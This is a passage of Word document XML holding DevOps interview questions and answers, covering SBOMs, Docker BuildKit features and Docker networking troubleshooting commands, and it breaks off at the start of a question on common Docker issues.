        <w:t xml:space="preserve">               * SLSA</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * OpenSSF</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>SBOM vs Vulnerability Scan</w:t>
        <w:br/>
        <w:t>SBOM</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Vulnerability Scan</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Lists components</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Finds vulnerabilities</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Inventory</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Security assessment</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Shows dependencies</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Shows CVEs</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Static catalog</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Risk analysis</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Used for visibility</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Used for remediation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>An SBOM does not tell you if something is vulnerable; it tells you what exists. Vulnerability scanners use the SBOM to identify affected components.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (1 Minute)</w:t>
        <w:br/>
        <w:t>SBOM, or Software Bill of Materials, is a detailed inventory of all software components, libraries, dependencies, and packages used in an application or container image. It provides visibility into what software is running in an environment and is essential for software supply chain security. SBOMs help organizations quickly identify impacted applications when vulnerabilities such as Log4Shell are disclosed. Common SBOM formats include SPDX and CycloneDX, and tools like Syft and Trivy can generate SBOMs as part of CI/CD pipelines. SBOMs are often combined with image signing and vulnerability scanning to strengthen DevSecOps and MLOps security practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q395. What is BuildKit?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is BuildKit?</w:t>
        <w:br/>
        <w:t>BuildKit is the modern build engine used by Docker to build container images faster, more securely, and more efficiently than the legacy Docker builder.</w:t>
        <w:br/>
        <w:t>It is the technology behind:</w:t>
        <w:br/>
        <w:t>docker build</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>in modern Docker versions.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why BuildKit?</w:t>
        <w:br/>
        <w:t>The old Docker builder had limitations:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Slow builds</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Poor caching</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Sequential execution</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Weak secret handling</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Large image sizes</w:t>
        <w:br/>
        <w:t>BuildKit solves these problems by providing:</w:t>
        <w:br/>
        <w:t>✅ Faster builds</w:t>
        <w:br/>
        <w:t>✅ Parallel execution</w:t>
        <w:br/>
        <w:t>✅ Advanced caching</w:t>
        <w:br/>
        <w:t>✅ Secret management</w:t>
        <w:br/>
        <w:t>✅ Multi-platform builds</w:t>
        <w:br/>
        <w:t>✅ Better CI/CD performance</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Traditional Docker build:</w:t>
        <w:br/>
        <w:t>FROM ubuntu</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>RUN apt-get update</w:t>
        <w:br/>
        <w:t>RUN apt-get install -y python3</w:t>
        <w:br/>
        <w:t>RUN pip install flask</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Old builder:</w:t>
        <w:br/>
        <w:t>Step 1</w:t>
        <w:br/>
        <w:t>Step 2</w:t>
        <w:br/>
        <w:t>Step 3</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Sequential execution.</w:t>
        <w:br/>
        <w:t>BuildKit:</w:t>
        <w:br/>
        <w:t>Analyze dependencies</w:t>
        <w:br/>
        <w:t>Parallelize operations</w:t>
        <w:br/>
        <w:t>Reuse cache efficiently</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Build completes much faster.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Enable BuildKit</w:t>
        <w:br/>
        <w:t>Temporary:</w:t>
        <w:br/>
        <w:t>export DOCKER_BUILDKIT=1</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Build:</w:t>
        <w:br/>
        <w:t>docker build .</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Or:</w:t>
        <w:br/>
        <w:t>DOCKER_BUILDKIT=1 docker build .</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key Features</w:t>
        <w:br/>
        <w:t>1. Parallel Build Execution</w:t>
        <w:br/>
        <w:t>BuildKit executes independent stages simultaneously.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>FROM node:20 AS frontend</w:t>
        <w:br/>
        <w:t># build frontend</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>FROM maven:3.9 AS backend</w:t>
        <w:br/>
        <w:t># build backend</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>BuildKit can process both stages in parallel.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Advanced Caching</w:t>
        <w:br/>
        <w:t>Legacy builder:</w:t>
        <w:br/>
        <w:t>Layer changed</w:t>
        <w:br/>
        <w:t>↓</w:t>
        <w:br/>
        <w:t>Everything rebuilt</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>BuildKit:</w:t>
        <w:br/>
        <w:t>Reuse unchanged layers</w:t>
        <w:br/>
        <w:t>Only rebuild what's necessary</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Faster CI/CD pipelines.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Cache Export/Import</w:t>
        <w:br/>
        <w:t>Store cache remotely.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>docker buildx build \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --cache-to=type=registry \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --cache-from=type=registry</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Useful in:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Jenkins</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * GitHub Actions</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * GitLab CI</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cloud Build</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Secret Management</w:t>
        <w:br/>
        <w:t>Bad practice:</w:t>
        <w:br/>
        <w:t>ENV AWS_SECRET_KEY=xxxx</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Secret becomes part of image history.</w:t>
        <w:br/>
        <w:t>BuildKit:</w:t>
        <w:br/>
        <w:t>RUN --mount=type=secret,id=aws \</w:t>
        <w:br/>
        <w:t xml:space="preserve">    some-command</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Build secret is never stored in the image.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5. SSH Forwarding</w:t>
        <w:br/>
        <w:t>Useful for private Git repositories.</w:t>
        <w:br/>
        <w:t>RUN --mount=type=ssh git clone git@github.com:company/repo.git</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>No SSH key stored in image.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>6. Multi-Stage Build Optimization</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>FROM golang AS builder</w:t>
        <w:br/>
        <w:t>RUN go build app</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>FROM alpine</w:t>
        <w:br/>
        <w:t>COPY --from=builder /app .</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>BuildKit optimizes dependency tracking and caching between stages.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>7. Multi-Architecture Builds</w:t>
        <w:br/>
        <w:t>Build for:</w:t>
        <w:br/>
        <w:t>amd64</w:t>
        <w:br/>
        <w:t>arm64</w:t>
        <w:br/>
        <w:t>arm/v7</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Using Buildx:</w:t>
        <w:br/>
        <w:t>docker buildx build \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --platform linux/amd64,linux/arm64 .</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important for:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Apple Silicon Macs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * ARM servers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubernetes clusters with mixed architectures</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>BuildKit vs Legacy Builder</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Legacy Builder</w:t>
        <w:br/>
        <w:tab/>
        <w:t>BuildKit</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Parallel builds</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Advanced cache</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Secret management</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>SSH forwarding</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Multi-platform builds</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Faster builds</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>BuildKit and DevOps</w:t>
        <w:br/>
        <w:t>Common CI/CD flow:</w:t>
        <w:br/>
        <w:t>Git Push</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Jenkins/GitHub Actions</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>BuildKit Build</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Scan Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Generate SBOM</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Sign Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Push Registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Deploy to Kubernetes</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>BuildKit significantly reduces build times in large enterprise pipelines.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>BuildKit and MLOps</w:t>
        <w:br/>
        <w:t>For ML workloads:</w:t>
        <w:br/>
        <w:t>FROM python:3.12</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY requirements.txt .</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>RUN pip install -r requirements.txt</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY model.pkl .</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>BuildKit:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Reuses dependency cache</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Speeds up model-serving image builds</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Reduces CI/CD execution time</w:t>
        <w:br/>
        <w:t>Useful when building:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * MLflow images</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubeflow components</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Model serving containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Inference services</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (1 Minute)</w:t>
        <w:br/>
        <w:t>BuildKit is Docker's modern image build engine that provides faster, more efficient, and more secure container image builds. It improves on the legacy Docker builder by supporting parallel execution, advanced caching, secret management, SSH forwarding, and multi-platform image creation. BuildKit is commonly used in CI/CD pipelines to reduce build times and improve security by preventing secrets from being embedded into images. It is also the foundation for Docker Buildx, which enables building images for multiple architectures such as AMD64 and ARM64.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q396. Explain Docker networking troubleshooting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Docker Networking Troubleshooting</w:t>
        <w:br/>
        <w:t>Docker networking troubleshooting involves identifying and resolving connectivity issues between:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Container ↔ Container</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Container ↔ Host</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Container ↔ Internet</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Container ↔ External Services (DB, APIs, etc.)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common Docker Networking Issues</w:t>
        <w:br/>
        <w:t>1. Container Cannot Reach Internet</w:t>
        <w:br/>
        <w:t>Symptom:</w:t>
        <w:br/>
        <w:t>docker exec -it app ping google.com</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Fails.</w:t>
        <w:br/>
        <w:t>Checks:</w:t>
        <w:br/>
        <w:t>docker network ls</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>docker inspect bridge</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>docker exec -it app nslookup google.com</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Possible causes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * DNS issue</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Firewall rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Docker bridge problem</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Corporate proxy restrictions</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Container Cannot Reach Another Container</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>app-container</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ↓</w:t>
        <w:br/>
        <w:t>db-container</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Application gets:</w:t>
        <w:br/>
        <w:t>Connection refused</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Check:</w:t>
        <w:br/>
        <w:t>docker network ls</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>docker network inspect my-network</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Verify both containers are on the same network:</w:t>
        <w:br/>
        <w:t>docker inspect app</w:t>
        <w:br/>
        <w:t>docker inspect db</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Test:</w:t>
        <w:br/>
        <w:t>docker exec -it app ping db</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Port Mapping Not Working</w:t>
        <w:br/>
        <w:t>Container:</w:t>
        <w:br/>
        <w:t>docker run -p 8080:80 nginx</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Expected:</w:t>
        <w:br/>
        <w:t>localhost:8080</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Not reachable.</w:t>
        <w:br/>
        <w:t>Check:</w:t>
        <w:br/>
        <w:t>docker ps</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Verify:</w:t>
        <w:br/>
        <w:t>docker port &lt;container_id&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Check host:</w:t>
        <w:br/>
        <w:t>netstat -tulpn | grep 8080</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>or</w:t>
        <w:br/>
        <w:t>ss -tulpn</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Possible causes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Wrong port mapping</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Application not listening</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Host firewall blocking traffic</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. DNS Resolution Failure</w:t>
        <w:br/>
        <w:t>Inside container:</w:t>
        <w:br/>
        <w:t>nslookup google.com</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Fails.</w:t>
        <w:br/>
        <w:t>Inspect:</w:t>
        <w:br/>
        <w:t>cat /etc/resolv.conf</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Run with custom DNS:</w:t>
        <w:br/>
        <w:t>docker run \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --dns 8.8.8.8 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  nginx</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key Commands for Troubleshooting</w:t>
        <w:br/>
        <w:t>Check Running Containers</w:t>
        <w:br/>
        <w:t>docker ps</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>List Networks</w:t>
        <w:br/>
        <w:t>docker network ls</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>bridge</w:t>
        <w:br/>
        <w:t>host</w:t>
        <w:br/>
        <w:t>none</w:t>
        <w:br/>
        <w:t>my-app-network</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Inspect Network</w:t>
        <w:br/>
        <w:t>docker network inspect bridge</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Shows:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Subnet</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Gateway</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Connected containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * IP addresses</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Inspect Container Networking</w:t>
        <w:br/>
        <w:t>docker inspect app</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Look for:</w:t>
        <w:br/>
        <w:t>"Networks": {</w:t>
        <w:br/>
        <w:t xml:space="preserve">   "bridge": {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "IPAddress": "172.17.0.2"</w:t>
        <w:br/>
        <w:t xml:space="preserve">   }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Enter Container</w:t>
        <w:br/>
        <w:t>docker exec -it app sh</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>or</w:t>
        <w:br/>
        <w:t>docker exec -it app bash</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Check IP Address</w:t>
        <w:br/>
        <w:t>Inside container:</w:t>
        <w:br/>
        <w:t>ip addr</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>or</w:t>
        <w:br/>
        <w:t>hostname -i</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Test Connectivity</w:t>
        <w:br/>
        <w:t>Ping another container:</w:t>
        <w:br/>
        <w:t>ping db</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Ping IP:</w:t>
        <w:br/>
        <w:t>ping 172.18.0.3</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Check Open Ports</w:t>
        <w:br/>
        <w:t>Inside container:</w:t>
        <w:br/>
        <w:t>netstat -tulpn</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>or</w:t>
        <w:br/>
        <w:t>ss -tulpn</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real Interview Scenario</w:t>
        <w:br/>
        <w:t>Problem</w:t>
        <w:br/>
        <w:t>Application cannot connect to PostgreSQL.</w:t>
        <w:br/>
        <w:t>App → Connection Timeout → PostgreSQL</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Troubleshooting Approach</w:t>
        <w:br/>
        <w:t>Step 1: Verify containers</w:t>
        <w:br/>
        <w:t>docker ps</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Step 2: Check network</w:t>
        <w:br/>
        <w:t>docker network inspect app-network</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Step 3: Verify DNS</w:t>
        <w:br/>
        <w:t>docker exec -it app ping postgres</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Step 4: Check database port</w:t>
        <w:br/>
        <w:t>docker exec -it postgres ss -tulpn</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Expected:</w:t>
        <w:br/>
        <w:t>LISTEN 0 128 *:5432</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Step 5: Test connection</w:t>
        <w:br/>
        <w:t>docker exec -it app nc -zv postgres 5432</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>If successful:</w:t>
        <w:br/>
        <w:t>Connection succeeded</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Step 6: Check application config</w:t>
        <w:br/>
        <w:t>DB_HOST=postgres</w:t>
        <w:br/>
        <w:t>DB_PORT=5432</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Troubleshooting Docker Compose Networking</w:t>
        <w:br/>
        <w:t>Compose automatically creates a network.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>services:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  app:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  db:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Containers communicate using service names:</w:t>
        <w:br/>
        <w:t>DB_HOST=db</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Not:</w:t>
        <w:br/>
        <w:t>DB_HOST=localhost</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>A common mistake is using:</w:t>
        <w:br/>
        <w:t>localhost</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Inside a container, localhost means the container itself, not another container.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Bridge vs Host Networking Issues</w:t>
        <w:br/>
        <w:t>Bridge Network (Default)</w:t>
        <w:br/>
        <w:t>docker run nginx</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Container gets:</w:t>
        <w:br/>
        <w:t>172.x.x.x</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Requires port mapping.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Host Network</w:t>
        <w:br/>
        <w:t>docker run --network host nginx</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Container shares host network.</w:t>
        <w:br/>
        <w:t>Useful for debugging port issues.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Useful Debugging Commands</w:t>
        <w:br/>
        <w:t>docker network ls</w:t>
        <w:br/>
        <w:t>docker network inspect &lt;network&gt;</w:t>
        <w:br/>
        <w:t>docker inspect &lt;container&gt;</w:t>
        <w:br/>
        <w:t>docker exec -it &lt;container&gt; sh</w:t>
        <w:br/>
        <w:t>ip addr</w:t>
        <w:br/>
        <w:t>ping</w:t>
        <w:br/>
        <w:t>curl</w:t>
        <w:br/>
        <w:t>nslookup</w:t>
        <w:br/>
        <w:t>dig</w:t>
        <w:br/>
        <w:t>netstat -tulpn</w:t>
        <w:br/>
        <w:t>ss -tulpn</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (2 Minutes)</w:t>
        <w:br/>
        <w:t>When troubleshooting Docker networking, I follow a layered approach. First, I verify that the containers are running using docker ps. Then I inspect the network configuration using docker network ls and docker network inspect to ensure the containers are attached to the correct network. Next, I test connectivity using ping, curl, or nc from inside the container and verify DNS resolution using nslookup or dig. If ports are inaccessible, I check port mappings with docker ps, docker port, and validate that the application is listening on the expected port using ss or netstat. For Docker Compose environments, I confirm that services are communicating via service names rather than localhost. This systematic approach helps isolate whether the issue is related to DNS, networking, firewall rules, port mappings, or application configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q397. What are common Docker issues?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: For a 6–8 year DevOps/MLOps Engineer interview, common Docker issues are often asked as troubleshooting scenarios.</w:t>
        <w:br/>
        <w:t>1. Container Keeps Restarting (CrashLoop)</w:t>
        <w:br/>
        <w:t>Symptoms</w:t>
        <w:br/>
        <w:t>docker ps</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Shows:</w:t>
        <w:br/>
        <w:t>Restarting (1) 5 seconds ago</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Troubleshooting</w:t>
        <w:br/>
        <w:t>Check logs:</w:t>
        <w:br/>
        <w:t>docker logs &lt;container-id&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Inspect exit code:</w:t>
        <w:br/>
        <w:t>docker inspect &lt;container-id&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common causes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Application crash</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Missing environment variables</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Database unavailable</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Wrong startup command</w:t>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>docker run myapp</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Application expects:</w:t>
        <w:br/>
        <w:t>DB_HOST=postgres</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>but variable is missing.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Port Not Accessible</w:t>
        <w:br/>
